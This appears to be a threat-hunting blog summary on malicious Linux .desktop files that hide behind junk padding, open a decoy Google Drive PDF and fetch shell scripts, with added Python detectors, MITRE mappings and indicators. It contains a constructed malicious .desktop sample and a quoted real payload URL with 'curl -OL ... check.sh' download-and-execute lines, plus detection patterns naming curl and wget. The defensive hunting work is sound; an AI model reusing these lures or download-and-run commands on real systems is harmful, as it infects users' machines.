Threat actors have been abusing Linux .desktop files, padding them with obfuscated junk code ahead of commands that download malware, while opening a PDF hosted on Google Drive as a distraction. This blog provides detailed hunting techniques and proactive detection queries for identifying such threats, focusing on behaviors in Linux desktop environments and the related process executions. #GoogleThreatIntelligence #Linux #MalwareHunting
Keypoints
- A new wave of malicious .desktop files has been observed leveraging obfuscation with junk code mixed into legitimate .desktop file structures to evade detection.
- These malicious .desktop files typically open PDF files hosted on Google Drive using the system’s default application as a distraction while downloading malware in subsequent stages.
- The files abuse Linux desktop environment utilities, such as xdg-open, exo-open, and exo-helper-2 (XFCE), gio open (GNOME), and kde-open (KDE), to open URLs automatically.
- Effective threat hunting can focus on process arguments such as --launch WebBrowser combined with Google Drive URLs, and on commands in xdg-open process chains.
- Queries targeting commands like grep -i ^xfcedesktopwindow and xprop -root, which the malware uses at runtime to identify an XFCE environment, are useful for detecting suspicious activity.
- Content-based hunting using specific strings found in .desktop files, such as "Exec=bash -c ", "Name=", ".pdf", and the header "[Desktop Entry]", can help identify malicious samples.
- Generic hunting queries that detect .desktop files with thousands of leading “#” characters can uncover additional downloader or loader activity linked to malware campaigns.
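The content-based indicators listed above can be turned into a file scanner. The following Python is an added example, not code from the original blog or from Google Threat Intelligence; the two embedded .desktop files are constructed samples (the decoy Google Drive link and the payload host are placeholders, not indicators from the post), and the 1000-character threshold for the leading "#" junk run is an assumption chosen to separate junk padding from ordinary comment headers.

```python
import re
from dataclasses import dataclass, field

# Constructed benign launcher: a normal text-editor entry.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=gedit
"""

# Constructed suspicious launcher modelled on the indicators in the post:
# thousands of leading '#' characters, a PDF-looking Name, and an inline
# shell in Exec that opens a decoy Drive link and pulls a script.
# URLs are placeholders, not real indicators.
SUSPICIOUS_DESKTOP = "#" * 5000 + "\n" + """
[Desktop Entry]
Type=Application
Name=Revised SOP for Webex Meeting.pdf
Exec=bash -c "xdg-open https://drive.google.com/file/d/EXAMPLE-ID/view; curl -OL https://payload.example/check.sh; bash check.sh"
Icon=application-pdf
"""

# Desktop-environment openers named in the post.
OPENER_RE = re.compile(r"\b(xdg-open|exo-open|exo-helper-2|gio open|kde-open)\b")
DRIVE_RE = re.compile(r"https?://drive\.google\.com/")
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
INLINE_SHELL_RE = re.compile(r"^(bash|sh|dash)\s+-c\b")
# Assumption: ordinary launchers never start with this many comment characters.
JUNK_HASH_THRESHOLD = 1000


@dataclass
class Verdict:
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def leading_hash_run(text: str) -> int:
    """Length of the run of '#' characters at the very start of the file."""
    m = re.match(r"#+", text)
    return len(m.group(0)) if m else 0


def desktop_entries(text: str) -> dict[str, str]:
    """Collect Key=Value lines, skipping comments, blanks and group headers.

    A later duplicate key overrides an earlier one, which is also how a
    junk-padded file can hide its real Exec below harmless-looking lines.
    """
    entries: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            entries[key.strip()] = value.strip()
    return entries


def scan_desktop(text: str) -> Verdict:
    """Apply the content-based hunting indicators to one .desktop file."""
    verdict = Verdict()
    if "[Desktop Entry]" not in text:
        return verdict  # not a desktop entry at all; nothing to judge
    run = leading_hash_run(text)
    if run >= JUNK_HASH_THRESHOLD:
        verdict.reasons.append(f"{run} leading '#' characters before the header")
    entries = desktop_entries(text)
    exec_line = entries.get("Exec", "")
    name = entries.get("Name", "")
    if INLINE_SHELL_RE.match(exec_line):
        verdict.reasons.append("Exec runs an inline shell command")
    if OPENER_RE.search(exec_line) and DRIVE_RE.search(exec_line):
        verdict.reasons.append("Exec opens a Google Drive URL through a desktop opener")
    if DOWNLOADER_RE.search(exec_line):
        verdict.reasons.append("Exec invokes a download tool")
    if name.lower().endswith(".pdf"):
        verdict.reasons.append("Name masquerades as a PDF document")
    return verdict


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_DESKTOP), ("suspicious", SUSPICIOUS_DESKTOP)):
        v = scan_desktop(sample)
        print(label, "->", "SUSPICIOUS" if v.suspicious else "clean", v.reasons)
```

Each reason is reported separately so an analyst can tune them: the junk-run check alone is a strong generic signal for the padded loaders the post describes, while the PDF-name check is only meaningful in combination with an inline shell in Exec.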
MITRE Techniques
- [T1204.002] User Execution: Malicious File – Threat actors utilize malicious .desktop files, which upon execution trigger legitimate system utilities to launch malicious payloads ('…anonymous pdf file opened using xdg-open…').
- [T1105] Ingress Tool Transfer – The .desktop file downloads secondary malware stages from URLs hosted on Google Drive or attacker-controlled servers ('…download a .sh file and execute it using curl -OL https://minio.daviduwu.ovh/public/check.sh').
- [T1059] Command and Scripting Interpreter – The Exec key runs bash commands embedded within the malicious .desktop file to execute scripts and commands ('Exec=bash -c "…').
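The process-level behaviors behind these techniques (an inline shell spawning xdg-open or exo-open --launch WebBrowser toward Google Drive, the xprop -root and grep -i ^xfcedesktopwindow environment check, and a curl download in the same chain) can be hunted in process telemetry. The Python below is an added example, not code from the original blog; the event list is constructed sample telemetry with pid/ppid/cmdline fields (the shape an auditd or eBPF collector would give, which is an assumption), and the payload URL is a placeholder.

```python
import re

# Constructed sample process events, not from the original blog.
# pids 200-205 model the malicious .desktop chain; 300-301 model a user
# opening a local document from the file manager.
EVENTS = [
    {"pid": 100, "ppid": 1,   "cmdline": "xfce4-session"},
    {"pid": 200, "ppid": 100, "cmdline": "bash -c xprop -root | grep -i ^xfcedesktopwindow"},
    {"pid": 201, "ppid": 200, "cmdline": "xprop -root"},
    {"pid": 202, "ppid": 200, "cmdline": "grep -i ^xfcedesktopwindow"},
    {"pid": 203, "ppid": 200, "cmdline": "exo-open --launch WebBrowser https://drive.google.com/file/d/EXAMPLE-ID/view"},
    {"pid": 204, "ppid": 200, "cmdline": "curl -OL https://payload.example/check.sh"},
    {"pid": 205, "ppid": 200, "cmdline": "bash check.sh"},
    {"pid": 300, "ppid": 100, "cmdline": "thunar"},
    {"pid": 301, "ppid": 300, "cmdline": "xdg-open /home/user/report.pdf"},
]

OPENERS = re.compile(r"^(xdg-open|exo-open|exo-helper-2|gio open|kde-open)\b")
GDRIVE_LAUNCH = re.compile(r"^(exo-open|exo-helper-2) --launch WebBrowser .*drive\.google\.com")
XFCE_PROBE = re.compile(r"^(xprop -root|grep -i \^xfcedesktopwindow)")
DOWNLOADER = re.compile(r"^(curl|wget)\b")
INLINE_SHELL = re.compile(r"^(bash|sh|dash) -c\b")


def index(events):
    """Map pid -> event so parents can be looked up in O(1)."""
    return {e["pid"]: e for e in events}


def parent(by_pid, event):
    return by_pid.get(event["ppid"])


def hunt(events):
    """Tag each event with the hunting rules it matches.

    Rules that depend on the parent (opener or downloader launched from an
    inline 'bash -c') need the process tree; a bare xdg-open from a file
    manager is normal user activity and is deliberately not flagged.
    """
    by_pid = index(events)
    hits = {}
    for e in events:
        cmd = e["cmdline"]
        p = parent(by_pid, e)
        from_shell = p is not None and INLINE_SHELL.match(p["cmdline"]) is not None
        reasons = []
        if XFCE_PROBE.match(cmd):
            reasons.append("xfce_env_probe")
        if GDRIVE_LAUNCH.match(cmd):
            reasons.append("gdrive_browser_launch")
        if from_shell and OPENERS.match(cmd):
            reasons.append("opener_from_inline_shell")
        if from_shell and DOWNLOADER.match(cmd):
            reasons.append("download_from_inline_shell")
        if reasons:
            hits[e["pid"]] = reasons
    return hits


def suspicious_chains(events):
    """Pids of inline-shell parents whose children both open a decoy and download.

    Correlating the decoy opener with the download in one parent is what
    separates the documented .desktop loader from a script that merely
    opens a browser or merely runs curl.
    """
    by_pid = index(events)
    chains = {}
    for pid, reasons in hunt(events).items():
        p = parent(by_pid, by_pid[pid])
        if p is None or not INLINE_SHELL.match(p["cmdline"]):
            continue
        chains.setdefault(p["pid"], set()).update(reasons)
    decoy = {"opener_from_inline_shell", "gdrive_browser_launch"}
    return sorted(
        pid for pid, r in chains.items()
        if "download_from_inline_shell" in r and decoy & r
    )


if __name__ == "__main__":
    for pid, reasons in hunt(EVENTS).items():
        print(pid, reasons)
    print("suspicious inline-shell parents:", suspicious_chains(EVENTS))
```

The individual rule hits are useful on their own for triage, but the chain correlation is the query worth alerting on: the xprop/grep environment probe and the Drive browser launch are each plausible in isolation, while a single inline shell that probes the desktop, opens a Drive document and fetches a script matches the loader behavior the post describes.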
Indicators of Compromise
- [File Hash] Malicious .desktop files – c2f0f011eabb4fae94e7a5973f1f05208e197db983a09e2f7096bcff69a794d1, 8d61ce3651eb070c8cdb76a334a16e53ad865572, and 5 more hashes (samples uploaded in 2025).
- [Domain/URL] Hosting malware payloads – https://drive.google.com/ and https://minio.daviduwu.ovh/public/check.sh (used for distributing PDF distractions and shell scripts).
- [Filename] Malicious .desktop files – Opportunity for Exercise, Re Exercise of Option for pay Fixation.desktop, Revised SOP for Webex Meeting – MOD.desktop, and other filenames indicating social engineering tactics.